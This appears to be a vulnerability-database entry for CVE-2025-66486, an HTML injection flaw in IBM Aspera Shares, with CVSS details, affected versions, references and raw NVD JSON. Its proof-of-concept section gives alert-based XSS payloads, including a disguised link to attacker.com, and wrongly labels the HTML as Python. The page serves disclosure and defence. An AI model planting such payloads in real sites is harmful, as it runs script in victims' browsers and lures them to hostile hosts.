CVE-2025-66486

Description

IBM Aspera Shares 1.9.9 through 1.11.0 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_shares:*:*:*:*:*:*:*:* - VULNERABLE

IBM Aspera Shares 1.9.9

IBM Aspera Shares 1.10.0

IBM Aspera Shares 1.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for HTML Injection in IBM Aspera Shares -->
<!-- Payload to be injected in a vulnerable field (e.g., File Description) -->
<img src=x onerror=alert('HTML_Injection_PoC')>

<!-- Alternatively, a legitimate-looking link with malicious intent -->
<a href="http://attacker.com" onmouseover="alert('XSS')">Click here for important file</a>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66486
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66486
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66486/
[4] VulDB https://vuldb.com/cve/CVE-2025-66486
[5] https://www.ibm.com/support/pages/node/7267848

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66486", "sourceIdentifier": "[email protected]", "published": "2026-04-01T23:17:02.430", "lastModified": "2026-04-03T19:57:14.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Shares 1.9.9 through 1.11.0 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_shares:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.9.9", "versionEndExcluding": "1.11.1", "matchCriteriaId": "E91033A7-CCAD-49AB-814E-73898AC951E9"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267848", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}